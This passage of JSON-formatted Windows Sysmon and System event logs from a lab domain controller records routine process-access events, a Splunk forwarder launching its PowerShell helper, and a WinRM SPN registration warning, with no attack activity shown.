C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:56.781","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:57","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:56","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2321,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:56.781\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:56.781","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:57","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:56","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2322,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:56.781\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:56.781","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:57","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:56","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2323,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:56.781\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:56.781","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:57","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:56","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2324,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:56.781\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:56.781","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:57","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:56","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2325,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:56.781\r\nSourceProcessGUID: {A837DB8D-01C6-5F25-0000-0010F1650300}\r\nSourceProcessId: 3776\r\nSourceThreadId: 3796\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {A837DB8D-01D0-5F25-0000-0010621B0400}\r\nTargetProcessId: 3752\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:56.781","SourceProcessGUID":"{A837DB8D-01C6-5F25-0000-0010F1650300}","SourceProcessId":"3776","SourceThreadId":"3796","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{A837DB8D-01D0-5F25-0000-0010621B0400}","TargetProcessId":"3752","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:57","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:56","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2326,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:56.937\r\nSourceProcessGUID: {A837DB8D-01D0-5F25-0000-0010621B0400}\r\nSourceProcessId: 3752\r\nSourceThreadId: 8\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-0010C3C30200}\r\nTargetProcessId: 3088\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nGrantedAccess: 0x101400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+55e675|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+55e1a6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+6b453|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+8e8530|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:56.937","SourceProcessGUID":"{A837DB8D-01D0-5F25-0000-0010621B0400}","SourceProcessId":"3752","SourceThreadId":"8","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-0010C3C30200}","TargetProcessId":"3088","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","GrantedAccess":"0x101400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+55e675|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+55e1a6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+6b453|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+8e8530|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:57","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:58","Hostname":"win-dc-881393.attackrange.local","Keywords":36028797018963968,"EventType":"WARNING","SeverityValue":3,"Severity":"WARNING","EventID":10154,"SourceName":"Microsoft-Windows-WinRM","ProviderGuid":"{A7975C8F-AC13-49F1-87DA-5A984A4AB417}","Version":0,"Task":0,"OpcodeValue":0,"RecordNumber":76821,"ProcessID":0,"ThreadID":0,"Channel":"System","Message":"The WinRM service failed to create the following SPNs: WSMAN/win-dc-881393.attackrange.local; WSMAN/win-dc-881393. \r\n\r\n Additional Data \r\n The error received was 1355: %%1355.\r\n\r\n User Action \r\n The SPNs can be created by an administrator using setspn.exe utility.","Opcode":"Info","spn1":"WSMAN/win-dc-881393.attackrange.local","spn2":"WSMAN/win-dc-881393","error":"1355","EventReceivedTime":"2020-08-01 05:46:58","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:57","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":2327,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:57.454\r\nProcessGuid: {A837DB8D-01D1-5F25-0000-00105F1D0400}\r\nProcessId: 3340\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\r\nFileVersion: ?\r\nDescription: ?\r\nProduct: ?\r\nCompany: ?\r\nOriginalFileName: ?\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\" --ps2\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {A837DB8D-01B3-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C\r\nParentProcessGuid: {A837DB8D-01C5-5F25-0000-0010C3C30200}\r\nParentProcessId: 3088\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 05:46:57.454","ProcessGuid":"{A837DB8D-01D1-5F25-0000-00105F1D0400}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe","FileVersion":"?","Description":"?","Product":"?","Company":"?","OriginalFileName":"?","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\" --ps2","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{A837DB8D-01B3-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C","ParentProcessGuid":"{A837DB8D-01C5-5F25-0000-0010C3C30200}","ParentProcessId":"3088","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","EventReceivedTime":"2020-08-01 05:46:58","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:57","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2328,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:57.453\r\nSourceProcessGUID: {A837DB8D-01C5-5F25-0000-0010C3C30200}\r\nSourceProcessId: 3088\r\nSourceThreadId: 4056\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetProcessGUID: {A837DB8D-01D1-5F25-0000-00105F1D0400}\r\nTargetProcessId: 3340\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:57.453","SourceProcessGUID":"{A837DB8D-01C5-5F25-0000-0010C3C30200}","SourceProcessId":"3088","SourceThreadId":"4056","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetProcessGUID":"{A837DB8D-01D1-5F25-0000-00105F1D0400}","TargetProcessId":"3340","TargetImage":"C:\\Program 